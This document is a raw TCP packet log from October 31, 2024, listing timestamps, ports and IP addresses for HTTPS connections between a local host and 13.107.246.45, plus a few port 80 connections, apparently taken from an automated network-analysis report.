Oct 31, 2024 19:20:00.325609922 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.325658083 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.347300053 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.347340107 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.347376108 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.347404957 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.347418070 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.347444057 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.448554993 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.448590994 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.448719025 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.448748112 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.452053070 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.469980001 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.470019102 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.470057964 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.470081091 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.470098972 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.470114946 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.471792936 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.471812010 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.471873999 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.471887112 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.472013950 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.473498106 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.473522902 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.473551989 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.473562002 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.473587036 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.473601103 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.572154045 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.572185040 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.572254896 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.572280884 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.572300911 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.572336912 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.592933893 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.592957973 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.593030930 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.593059063 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.593841076 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.593863010 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.593888998 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.593899012 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.593914986 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.593940020 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.594774961 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.594789028 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.594831944 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.594840050 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.595719099 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.595737934 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.595767021 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.595777035 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.595819950 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.595830917 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.596662998 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.596678972 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.596724033 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.596738100 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.598156929 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.598176956 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.598213911 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.598233938 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.598253012 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.598272085 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.612329006 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.694605112 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.694691896 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.694751978 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.694808960 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.717601061 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.717649937 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.717670918 CET	51254	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.717679024 CET	443	51254	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.992965937 CET	51255	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.993011951 CET	443	51255	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.993709087 CET	51255	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.994294882 CET	51255	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.994312048 CET	443	51255	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.994906902 CET	51256	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.994934082 CET	51257	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.994951010 CET	443	51256	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.994966030 CET	443	51257	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.995034933 CET	51256	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.995194912 CET	51256	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.995198011 CET	51257	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.995199919 CET	443	51256	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.995332956 CET	51257	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.995343924 CET	443	51257	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.995909929 CET	51258	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.995920897 CET	443	51258	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.995968103 CET	51259	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.995976925 CET	443	51259	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.995997906 CET	51258	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.996031046 CET	51259	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.996114969 CET	51258	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.996126890 CET	443	51258	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:00.996241093 CET	51259	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:00.996256113 CET	443	51259	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.724587917 CET	443	51257	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.725339890 CET	443	51258	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.725868940 CET	51257	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.725889921 CET	443	51257	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.726416111 CET	51257	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.726423025 CET	443	51257	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.726763010 CET	51258	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.726798058 CET	443	51258	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.727215052 CET	51258	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.727230072 CET	443	51258	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.734596014 CET	443	51259	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.738394022 CET	443	51256	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.739764929 CET	51259	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.739774942 CET	443	51259	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.741233110 CET	51259	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.741238117 CET	443	51259	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.741607904 CET	51256	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.741643906 CET	443	51256	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.742131948 CET	51256	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.742144108 CET	443	51256	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.749735117 CET	443	51255	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.750647068 CET	51255	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.750672102 CET	443	51255	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.751087904 CET	51255	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.751094103 CET	443	51255	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.855093956 CET	443	51257	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.855119944 CET	443	51257	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.855175018 CET	51257	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.855194092 CET	443	51257	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.855243921 CET	443	51258	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.855295897 CET	443	51257	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.855302095 CET	443	51258	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.855370045 CET	51257	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.855375051 CET	51258	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.855469942 CET	51258	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.855489969 CET	443	51258	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.855499983 CET	51257	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.855504036 CET	51258	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.855511904 CET	443	51258	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.855514050 CET	443	51257	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.855525017 CET	51257	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.855530024 CET	443	51257	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.858704090 CET	51260	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.858730078 CET	51261	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.858752966 CET	443	51260	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.858757973 CET	443	51261	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.858829975 CET	51260	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.858989000 CET	51261	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.858989954 CET	51260	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.859004021 CET	443	51260	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.859016895 CET	51261	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.859021902 CET	443	51261	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.866919041 CET	443	51259	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.867250919 CET	443	51259	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.867340088 CET	51259	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.867374897 CET	51259	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.867379904 CET	443	51259	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.867393017 CET	51259	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.867397070 CET	443	51259	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.869621992 CET	51262	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.869642019 CET	443	51262	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.869718075 CET	51262	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.869889021 CET	51262	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.869904995 CET	443	51262	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.870506048 CET	443	51256	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.870529890 CET	443	51256	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.870588064 CET	51256	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.870603085 CET	443	51256	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.870624065 CET	443	51256	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.870642900 CET	51256	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.870672941 CET	51256	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.870712996 CET	51256	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.870728016 CET	443	51256	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.870743990 CET	51256	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.870762110 CET	443	51256	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.872629881 CET	51263	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.872652054 CET	443	51263	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.872772932 CET	51263	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.872857094 CET	51263	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.872870922 CET	443	51263	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.883981943 CET	443	51255	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.884005070 CET	443	51255	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.884067059 CET	51255	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.884088993 CET	443	51255	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.884134054 CET	51255	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.884140968 CET	443	51255	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.884152889 CET	443	51255	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.884196997 CET	51255	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.884263992 CET	51255	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.884274960 CET	443	51255	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.884284973 CET	51255	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.884289980 CET	443	51255	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.886212111 CET	51264	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.886226892 CET	443	51264	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:01.886374950 CET	51264	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.886441946 CET	51264	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:01.886455059 CET	443	51264	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.597718954 CET	443	51262	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.601455927 CET	51262	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.601485014 CET	443	51262	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.601972103 CET	51262	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.601980925 CET	443	51262	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.607280016 CET	443	51263	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.607660055 CET	51263	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.607676983 CET	443	51263	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.608074903 CET	51263	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.608079910 CET	443	51263	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.609736919 CET	443	51260	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.610114098 CET	51260	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.610130072 CET	443	51260	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.610470057 CET	51260	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.610486031 CET	443	51260	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.612731934 CET	443	51264	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.612953901 CET	51264	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.612970114 CET	443	51264	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.613301039 CET	51264	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.613306046 CET	443	51264	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.614964962 CET	443	51261	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.615225077 CET	51261	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.615240097 CET	443	51261	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.615586996 CET	51261	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.615592003 CET	443	51261	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.706037998 CET	49737	80	192.168.2.4	160.153.155.187
Oct 31, 2024 19:20:02.710910082 CET	80	49737	160.153.155.187	192.168.2.4
Oct 31, 2024 19:20:02.725250006 CET	443	51262	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.725325108 CET	443	51262	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.725486040 CET	51262	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.725672007 CET	51262	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.725709915 CET	443	51262	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.725733042 CET	51262	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.725739956 CET	443	51262	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.728946924 CET	51266	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.728972912 CET	443	51266	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.729063034 CET	51266	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.729269981 CET	51266	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.729279995 CET	443	51266	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.736991882 CET	443	51263	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.737039089 CET	443	51263	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.737216949 CET	51263	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.737485886 CET	51263	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.737499952 CET	443	51263	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.737518072 CET	51263	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.737523079 CET	443	51263	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.740147114 CET	51267	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.740190983 CET	443	51267	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.740287066 CET	51267	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.740425110 CET	51267	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.740442038 CET	443	51267	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.744147062 CET	443	51264	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.744272947 CET	443	51264	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.744329929 CET	51264	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.744401932 CET	51264	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.744407892 CET	443	51264	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.744420052 CET	51264	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.744425058 CET	443	51264	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.746644974 CET	51268	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.746680021 CET	443	51268	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.746757984 CET	51268	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.746911049 CET	51268	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.746926069 CET	443	51268	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.747140884 CET	443	51261	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.748315096 CET	443	51261	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.748370886 CET	51261	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.748406887 CET	51261	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.748414040 CET	443	51261	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.748431921 CET	51261	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.748435974 CET	443	51261	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.749022961 CET	443	51260	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.749881983 CET	443	51260	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.749975920 CET	51260	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.750003099 CET	51260	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.750003099 CET	51260	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.750024080 CET	443	51260	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.750036955 CET	443	51260	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.750335932 CET	51269	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.750375986 CET	443	51269	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.750443935 CET	51269	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.750561953 CET	51269	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.750577927 CET	443	51269	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.752010107 CET	51270	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.752022028 CET	443	51270	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:02.752089024 CET	51270	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.752219915 CET	51270	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:02.752233028 CET	443	51270	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.488255978 CET	443	51268	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.495201111 CET	443	51267	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.496836901 CET	443	51269	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.500746012 CET	443	51270	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.513983011 CET	443	51266	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.533566952 CET	51268	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.549189091 CET	51267	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.549191952 CET	51269	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.549196005 CET	49738	80	192.168.2.4	160.153.155.187
Oct 31, 2024 19:20:03.549272060 CET	51270	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.554089069 CET	80	49738	160.153.155.187	192.168.2.4
Oct 31, 2024 19:20:03.564861059 CET	51266	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.577174902 CET	51266	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.577179909 CET	443	51266	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.577651024 CET	51266	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.577655077 CET	443	51266	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.577840090 CET	51270	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.577850103 CET	443	51270	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.578191996 CET	51270	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.578198910 CET	443	51270	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.578363895 CET	51268	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.578367949 CET	443	51268	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.578686953 CET	51268	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.578691959 CET	443	51268	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.578869104 CET	51267	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.578876972 CET	443	51267	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.579193115 CET	51267	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.579209089 CET	443	51267	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.579343081 CET	51269	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.579355955 CET	443	51269	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.579946041 CET	51269	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.579951048 CET	443	51269	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.702677011 CET	443	51268	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.702756882 CET	443	51268	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.702811956 CET	51268	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.704121113 CET	51268	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.704137087 CET	443	51268	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.704148054 CET	51268	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.704154015 CET	443	51268	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.704929113 CET	443	51267	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.705106974 CET	443	51267	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.705158949 CET	51267	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.707053900 CET	443	51269	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.707130909 CET	443	51269	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.707133055 CET	443	51270	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.707200050 CET	51269	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.707302094 CET	443	51270	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.707355976 CET	51270	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.707462072 CET	51270	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.707465887 CET	443	51270	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.707482100 CET	51270	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.707485914 CET	443	51270	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.708337069 CET	51267	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.708337069 CET	51267	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:03.708355904 CET	443	51267	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:03.708367109 CET	443	51267	13.107.246.45	192.168.2.4
